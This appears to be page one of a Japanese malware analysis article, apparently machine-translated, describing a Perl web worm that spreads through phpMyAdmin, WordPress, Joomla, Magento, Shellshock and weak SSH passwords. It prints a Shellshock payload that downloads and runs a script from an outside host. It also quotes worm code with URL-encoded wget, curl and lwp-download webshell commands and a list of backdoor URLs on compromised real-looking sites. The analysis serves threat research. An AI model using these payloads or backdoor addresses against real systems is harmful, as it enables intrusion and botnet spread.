新世代の強力な Web ワームが捕獲され、1,000 を超える Web サイトに感染しました

最近、包括的な脆弱性スキャナーとして機能する、非常に斬新で強力な Web ワームが捕獲されました。このワームは主に、phpmyadmin、wordpress、joomla、magento などのよく知られた Web サイト アプリの脆弱性や、シェル破壊の脆弱性、弱い SSH パスワード、SQL インジェクションなど、一部の Web プログラムの高リスクの脆弱性を利用して拡散します。 、自動権限昇格。

感染したボットはサーバーから指示を受け取り、DDoS 攻撃、脆弱性スキャンを実行して他のホストに感染し、http プロキシとして機能し、IRC サーバーを生成します。分析の結果、感染したホストには Web プロキシとして機能する Web サイトが 1,000 あることが判明しました (悪名高い phpmyadmin ワーム zmeu を含む)。今後、関連するすべてのソース コードを共有します。

0×01 原因

vps の Web ログを調べたところ、zmeu の useragent や Shellshock のペイロードなどの攻撃の兆候が見られました。

次に、私は先導に従い、ボットをゲットシェルしました (WordPress の脆弱性を利用してデータベース構成ファイルをダウンロードし、データベースのパスワードを使用して Wordpress に正常にログインしましたが、プラグインをインストールする権限がなかったので、プラグインを挿入しました)記事が変更された insertPHP プラグインによって解析された php コード (韓国語では 1 時間以上かかりました)。

Web サイトのディレクトリで、セーフ モードのバイパスをサポートし、エージェントをインストールする非常に強力な PHP プログラムを見つけたので、さらに詳しく調べることにしました。

このボットからソース コードをダウンロードした後、衝撃的な CC プログラムを発見しました。

0×02 解析

このワームの pl スクリプト部分だけでも数万行のコードがありますので、不適切な解析があればご指摘ください。ボット ノードはサーバーの脆弱性をスキャンすると、脆弱なホストに制御スクリプトをダウンロードして実行し、ホストはボットになり、最後に制御対象ホストを登録するためにコントローラーに電子メールを送信します。たとえば、Shellshock のペイロード

"() { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";

system("wget http://xxxserver.com/shell.txt -O /tmp/shell.txt;curl -O /tmp/shell.txt http://xxxserver.com/shell.txt ;

perl /tmp/shell.txt ; rm -rf shell.txt ");'"

Web脆弱性感染からのプロセスを本筋として分析してみましょう。わかりやすくするために、一部のコードを省略します。

リモート ダウンロード サーバー アドレスを初期化します:

my $rceinjector = "http://xn--80ahdkbnppbheq0fsb7br0a.xn--j1amh/error.php";

my $ rceinjector2 = "http://xn--80ahdkbnppbheq0fsb7br0a.xn--j1amh/xml.php";

#my $arbitrary = "http://www.handelwpolsce.pl/images/Sport/rce .php";

#my $hostinjector = "wordpress.com.longlifeweld.com.my";

my $thumbid = "http://".$hostinjector."/petx .php";

my $thumbidx = "http://".$hostinjector."/cpx.php";

Linux ダウンロード コマンドが Web パラメーターを介して渡され、ボットが正常に悪用しました。脆弱性 getshell の後、制御されたスクリプトをダウンロードするためのこれらの指示が Webshel​​l に送信されます。

my $wgetdon = "?cmd=wget%20http%3A%2F%2F".$hostinjector."%2Fmagic.php;wget%20http%3A%2F%2F".$hostinjector."% 2Fbtx.php;wget%20http%3A%2F%2F".$hostinjector."%2Fmagic1.php";

my $lwpdon = "?cmd=lwp-download%20-a%20http%3A %2F%2F".$hostinjector."%2Fmagic.php;lwp-download%20-a%20http%3A%2F%2F".$hostinjector."%2Fbtx.php;lwp-download%20-a%20http %3A%2F%2F".$hostinjector."%2Fcpx.php";

my $curldon = "?cmd=curl%20-C%20-%20-O%20http%3A%2F %2F".$hostinjector."%2Fmagic.php;curl%20-C%20-%20-O%20http%3A%2F%2F".$hostinjector."%2Fbtx.php;curl%20-C% 20-%20-O%20http%3A%2F%2F".$hostinjector."%2Fcpx.php";

後のバッチ収集に備えて 1000 個の Web プロキシ バックドア アドレスを初期化します

私の @randombarner= ("http://www.lesyro.cz/administrator/components/com_media/helpers/errors.php",

"http://www.villaholidaycentre.co.uk/ include/ js/calendar/lang/seka.php",

"http://viewwebinars.com/wp-includes/errors.php",

"http://www. org.sg//components/com_jnews/includes/openflashchart/tmp-upload-images/components/search.php",

"http://www.linuxcompany.nl/modules/mod_login/error .php ",

"http://www.tkofschip.be/joomlasites/ankerintranet5/plugins/content/config.index.php",

"http://liftoffconsulting.ca /wp -includes/errors.php",

"http://www.voileenligne.com/audio/komo.php",

"http://www.gingerteastudio.com // wp-content/uploads/components/search.php",

"www.audiovisionglobal.pe/online/includes/js/calendar/lang/search.php",

[1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16] ] [17] [18] [19] [20] 次のページ